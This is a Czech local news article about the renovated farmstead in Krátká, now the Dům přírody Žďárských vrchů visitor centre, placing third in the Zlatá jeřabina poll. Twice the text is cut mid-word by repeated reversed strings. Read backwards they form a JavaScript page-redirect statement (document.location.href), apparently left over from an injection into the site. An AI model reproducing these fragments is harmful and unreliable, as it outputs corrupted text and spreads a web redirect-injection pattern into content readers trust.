Rainbow page separator

Dům přírody v Krátké uspěl v anketě Zlatá jeřabina

Pondělí, 17. května 2021

Krátká / Třetí mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v krajské anketě Zlatá jeřabina v kategorii péče o kulturní dědictví získala s celkem 417 hlasy obnova statku v Krátké, místní části Sněžného. Ve vesnické rezervaci tím pod hlavičkou Agentury ochrany přírody a krajiny ČR vznikl Dům přírody Žďárských vrchů, který byl uveden do provozu loni v červenci. Zařízení slouží jako návštěvnické centrum pro Chráněnou krajinnou oblast (CHKO) Žďárské vrchy a jeho provozovatelem je Český svaz ochránců přírody Kněžice ve spolupráci s obecně prospěšnou společností Chaloupky. V plánu jsou v něm rovněž akce týkající se environmentální výchovy, vzdělávání a osvěty.
Přestavbu financovaly evropské peníze v částce přesahující třicet milionů korun. Objekt se nachází uprostřed vesnické památkové rezervace, kdysi býval statkem, přičemž dnes je z něj středisko s vnitřní i venkovní expozicí. Součástí střediska je rovněž nedaleká s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todola u objektu číslo 12, která dříve sloužila jako infocentrum a nově jako zázemí pro možnost občerstvení.